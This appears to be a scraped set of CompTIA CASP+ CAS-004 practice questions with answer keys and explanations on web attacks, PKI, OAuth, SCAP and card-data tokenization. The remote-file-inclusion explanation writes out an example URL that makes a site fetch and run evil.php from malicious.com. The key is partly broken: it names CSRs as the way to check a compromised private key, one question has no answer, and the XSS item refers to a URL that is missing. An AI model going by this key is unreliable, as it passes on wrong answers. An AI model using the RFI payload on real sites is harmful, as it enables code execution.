Practice Free CAS-004 Exam Online Questions
A security engineer notices the company website allows users to supply URLs like the following example:
https://mycompany.com/main.php?Country=US
Which of the following vulnerabilities would MOST likely affect this site?
- A . SQL injection
- B . Remote file inclusion
- C . Directory traversal
- D . Unsecure references
B
Explanation:
Remote file inclusion (RFI) is a web vulnerability that allows an attacker to include malicious external files that are later run by the website or web application. This can lead to code execution, data theft, defacement, or other malicious actions. RFI typically occurs when a web application dynamically references external scripts using user-supplied input without proper validation or sanitization.
In this case, the website allows users to specify a country parameter in the URL that is used to include a file from another domain. For example, an attacker could craft a URL like this: https://mycompany.com/main.php?Country=https://malicious.com/evil.php
This would cause the website to include and execute the evil.php file from the malicious domain, which could contain any arbitrary code.
A cybersecurity analyst discovered a private key that could have been exposed.
Which of the following is the BEST way for the analyst to determine if the key has been compromised?
- A . HSTS
- B . CRL
- C . CSRs
- D . OCSP
C
Explanation:
Reference: https://www.ssl.com/faqs/compromised-private-keys/
A security engineer needs to implement a cost-effective authentication scheme for a new web-based application that requires:
• Rapid authentication
• Flexible authorization
• Ease of deployment
• Low cost but high functionality
Which of the following approaches best meets these objectives?
- A . Kerberos
- B . EAP
- C . SAML
- D . OAuth
- E . TACACS+
D
Explanation:
OAuth, which stands for Open Authorization, is a standard for authorization that enables secure token-based access. It allows users to grant a web application access to their information on another web application without giving it the credentials for their account. OAuth is particularly useful for rapid authentication, flexible authorization, ease of deployment, and offers high functionality at a low cost, making it an ideal choice for new web-based applications. This approach is well-suited for situations where web applications need to interact with each other on behalf of the user without sharing the user's password, such as integrating a geolocation application with Facebook. OAuth uses tokens issued by an authorization server, providing restricted access to a user's data, which aligns with the objectives of rapid authentication, flexible authorization, ease of deployment, and cost-effectiveness.
A recent audit discovered that multiple employees had been using their badges to walk through the secured data center to get to the employee break room. Most of the employees were given access during a previous project, but the access was not removed in a timely manner when the project was complete.
Which of the following would reduce the likelihood of this scenario occurring again?
- A . Create an automated quarterly attestation process that requires management approval for data center access and removes unapproved access.
- B . Require all employees to sign an AUP that prohibits accessing the data center without an active service ticket number.
- C . Remove all access to the data center badge readers and only re-add employees with a valid business purpose for entering the floor.
- D . Implement time-of-day restrictions on the data center badge readers and create automated alerts for unapproved swipe attempts.
A
Explanation:
Implementing an automated quarterly attestation process ensures that access is reviewed and approved regularly. This prevents unauthorized or unnecessary access from persisting over time, aligning with CASP+ objective 1.6, which emphasizes continuous access control monitoring.
Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext?
- A . Lattice-based cryptography
- B . Quantum computing
- C . Asymmetric cryptography
- D . Homomorphic encryption
D
Explanation:
Reference: https://searchsecurity.techtarget.com/definition/cryptanalysis
Homomorphic encryption is a type of encryption that allows computation and analysis of data within a ciphertext without knowledge of the plaintext. This means that encrypted data can be processed without being decrypted first, which enhances the security and privacy of the data. Homomorphic encryption can enable applications such as secure cloud computing, machine learning, and data analytics.
Reference:
https://www.ibm.com/security/homomorphic-encryption
https://www.synopsys.com/blogs/software-security/homomorphic-encryption/
The CI/CD pipeline requires code to have close to zero defects and zero vulnerabilities. The current process for any code releases into production uses two-week Agile sprints.
Which of the following would BEST meet the requirement?
- A . An open-source automation server
- B . A static code analyzer
- C . Trusted open-source libraries
- D . A single code repository for all developers
B
Explanation:
A static code analyzer is a tool that analyzes software without running it. It helps developers find and fix vulnerabilities, bugs, and security risks in new applications while the source code is in its 'static' state. By checking the code against a set of coding rules, standards, and best practices, it helps ensure that the code has close to zero defects and zero vulnerabilities, and it can also improve code quality, performance, and maintainability.
An organization wants to perform a scan of all its systems against best practice security configurations.
Which of the following SCAP standards, when combined, will enable the organization to view each of the configuration checks in a machine-readable checklist format for full automation? (Choose two.)
- A . ARF
- B . XCCDF
- C . CPE
- D . CVE
- E . CVSS
- F . OVAL
B,F
Explanation:
Reference: https://www.govinfo.gov/content/pkg/GOVPUB-C13-9ecd8eae582935c93d7f410e955dabb6/pdf/GOVPUB-C13-9ecd8eae582935c93d7f410e955dabb6.pdf (p.12)
XCCDF (Extensible Configuration Checklist Description Format) and OVAL (Open Vulnerability and Assessment Language) are two SCAP (Security Content Automation Protocol) standards that can enable the organization to view each of the configuration checks in a machine-readable checklist format for full automation. XCCDF is a standard for expressing security checklists and benchmarks, while OVAL is a standard for expressing system configuration information and vulnerabilities. ARF (Asset Reporting Format) is a standard for expressing the transport format of information about assets, not configuration checks. CPE (Common Platform Enumeration) is a standard for identifying and naming hardware, software, and operating systems, not configuration checks. CVE (Common Vulnerabilities and Exposures) is a standard for identifying and naming publicly known cybersecurity vulnerabilities, not configuration checks. CVSS (Common Vulnerability Scoring System) is a standard for assessing the severity of cybersecurity vulnerabilities, not configuration checks.
Verified Reference:
https://www.comptia.org/blog/what-is-scap
https://partners.comptia.org/docs/default-source/resources/casp-content-guide
A company would like to move its payment card data to a cloud provider.
Which of the following solutions will best protect account numbers from unauthorized disclosure?
- A . Storing the data in an encoded file
- B . Implementing database encryption at rest
- C . Only storing tokenized card data
- D . Implementing data field masking
C
Explanation:
Tokenization is the best solution to protect payment card data from unauthorized disclosure when moving to the cloud. Tokenization replaces sensitive card data with unique identifiers (tokens) that have no exploitable value outside the tokenization system. Even if the data is compromised, the attacker would not obtain actual card numbers. This is in line with PCI DSS requirements for protecting payment card information. Other solutions like encryption at rest or field masking help, but tokenization provides the strongest protection by ensuring that card data is not stored at all.
Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 - Risk Management (Tokenization and PCI DSS Compliance)
CompTIA CASP+ Study Guide: Data Protection Techniques (Tokenization)
An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely.
Which of the following features of these devices MOST likely led to this decision? (Select TWO.)
- A . Software-backed keystore
- B . Embedded cryptoprocessor
- C . Hardware-backed public key storage
- D . Support for stream ciphers
- E . Decentralized key management
- F . TPM 2.0 attestation services
A threat analyst notices the following URL while going through the HTTP logs.
Which of the following attack types is the threat analyst seeing?
- A . SQL injection
- B . CSRF
- C . Session hijacking
- D . XSS
D
Explanation:
XSS stands for cross-site scripting, which is a type of attack that injects malicious code into a web page that is then executed by the browser of a victim. The URL in the question contains a script tag that tries to execute a JavaScript code from an external source, which is a sign of XSS.
Verified Reference:
https://www.comptia.org/training/books/casp-cas-004-study-guide
https://owasp.org/www-community/attacks/xss/